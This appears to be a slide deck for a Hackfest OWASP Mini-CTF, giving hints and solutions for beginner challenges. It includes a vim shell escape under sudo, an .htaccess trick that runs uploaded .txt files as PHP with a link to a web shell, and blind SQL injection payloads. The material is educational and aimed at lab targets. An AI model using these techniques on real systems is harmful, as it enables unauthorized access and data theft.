Mini-CTF OWASP

What is it ?

  • What is the Mini-CTF ?
    • Short entry level challenge. 
    • Designed to make people learn about vulnerabilities.
    • Small competition at the Hackfest.
  • 4 of them will be presented today.
    • File upload.
    • Deserialization.
    • Advance SQL injection.
    • Privilege escalation.

Where ?

  • URL
    • https://owasp.zhack.ca
      • Privilege Escalation 2 / Privilege Escalation 1
      • Upload 2
      • SQL Injection 2
      • PHP Serialization 1
    • I usually keep the website up for 2-3 months after the CTF.
       
  • GitHub
    • https://github.com/HoLyVieR/Hackfest-MiniCTF-2017

Hints

 

  • Privilege Escalation 2 / Privilege Escalation 1
    • To launch
      • sudo -u admin COMMAND
  • Upload 2
    • PHP file are blocked by a .htaccess rule
    • You can upload more than one file in the same directory
    • Look for extensions or special file not blocked
  • SQL Injection 2
    • Try to look at what you can do with sub-select
  • PHP Serialization 1.
    • The "__destruct" method of an object will be automatically called. Try to find a way to chain this to reach the method that read or write file.

Solutions

 

  • Privilege Escalation 2 / Privilege Escalation 1
    • :e flag.txt
    • (ESC) !/bin/bash

Solutions

 

  • Upload 2
    • .htaccess + fichier txt
      • AddType application/x-httpd-php .txt
    • .htaccess shell
      • https://github.com/wireghoul/htshells/blob/master/shell/mod_php.shell.htaccess

Solutions

 

  • SQL Injection 2
    • True condition
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"F
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"FL
    • False condition
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"G
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"FK
    • Tab instead of parenthesis can also be used

Solutions

 

  • Deserialization
    • En démo !
Made with Slides.com